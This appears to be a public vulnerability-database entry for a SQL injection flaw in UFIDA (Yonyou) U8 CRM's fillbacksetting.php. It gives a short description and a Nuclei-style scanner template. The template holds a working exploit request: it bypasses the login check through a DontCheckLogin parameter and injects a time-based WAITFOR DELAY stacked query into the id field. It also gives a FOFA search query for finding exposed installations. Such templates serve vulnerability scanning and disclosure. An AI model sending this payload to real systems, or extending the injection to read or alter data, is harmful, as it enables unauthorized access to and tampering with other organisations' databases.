yonyou-u8-crm-tb-sqli: UFIDA U8 CRM fillbacksetting.php - SQL Injection

2025-08-01 yonyou-u8-crm-tb-sqli PoC Public

Description

UFIDA U8-CRM system /config/fillbacksetting.php contains an SQL injection vulnerability, which allows attackers to manipulate the database through maliciously constructed SQL statements, resulting in data leaks, tampering or destruction, and seriously threatening system security.

PoC

id: yonyou-u8-crm-tb-sqli

info:
  name: UFIDA U8 CRM fillbacksetting.php - SQL Injection
  author: s4e-io
  severity: high
  description: |
    UFIDA U8-CRM system /config/fillbacksetting.php contains an SQL injection vulnerability, which allows attackers to manipulate the database through maliciously constructed SQL statements, resulting in data leaks, tampering or destruction, and seriously threatening system security.
  reference:
    - https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BU8-CRM%E7%B3%BB%E7%BB%9Ffillbacksetting.php%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  classification:
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="用友U8CRM"
  tags: yonyou,u8-crm,sqli,vuln

http:
  - raw:
      - |
        @timeout 20s
        GET /config/fillbacksetting.php?DontCheckLogin=1&action=delete&id=-99;WAITFOR+DELAY+'0:0:6'-- HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=bgsesstimeout-;

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'contains(body, "{\"success\":true}")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402207ddb3107c113a2c1ea18d8288b2f529e129a208fbffd3d83e0f80b33326fccf5022029224d51ce0316b91d7fec12562f90d96bedd6b3cbbfb562d8c146fca88b6dee:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities